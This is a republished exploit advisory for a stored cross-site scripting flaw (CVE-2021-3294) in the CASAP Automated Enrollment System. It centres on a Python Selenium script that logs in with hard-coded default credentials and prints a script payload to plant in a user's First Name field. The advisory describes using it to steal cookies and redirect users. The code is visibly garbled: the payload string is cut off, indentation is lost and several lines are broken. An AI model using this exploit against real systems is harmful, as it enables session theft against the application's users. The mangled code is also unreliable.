CASAP Automated Enrollment System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 17th, 2021 📆 | 8586 Views ⚑

0

CASAP Automated Enrollment System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: CASAP Automated Enrollment System 1.0 – ‘First Name’ Stored XSS
# Author: nu11secur1ty
# Date: 02.15.2021
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Athor: https://www.sourcecodester.com/users/yna-ecole
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# CVE: CVE-2021-3294 [+] Credits: (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Exploit Program Code]#!/usr/bin/python3
# author @nu11secur1ty
# For CVE-2021-3294

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
import os

#enter the link to the website you want to automate login.
website_link=”http://localhost/Final/index.php”

#enter your login username
username=”yna.ecole”

#enter your login password
password=”12345″

#enter the element for username input field
element_for_username=”username”
#enter the element for password input field
element_for_password=”password”
#enter the element for submit button
element_for_submit=”login”

#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

exploit=”nu11
print(“If everything is ok, please paste this in to the Users in section in
First Namen”)
print(exploit)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print(“Some error occured :(“)

[Vendor]https://www.sourcecodester.com/users/yna-ecole

[Vulnerability Type]XSS

[CVE Reference]https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Security Issue]CASAP Automated Enrollment System 1.0 is affected by cross-site scripting
(XSS) in users.php.
An attacker can steal a cookie to perform user redirection to a malicious
website.

[Video]https://www.youtube.com/watch?v=_nhIZyJ8rxM

@nu11secur1ty
https://www.nu11secur1ty.com/

Source link

Tagged with:



Leave a Reply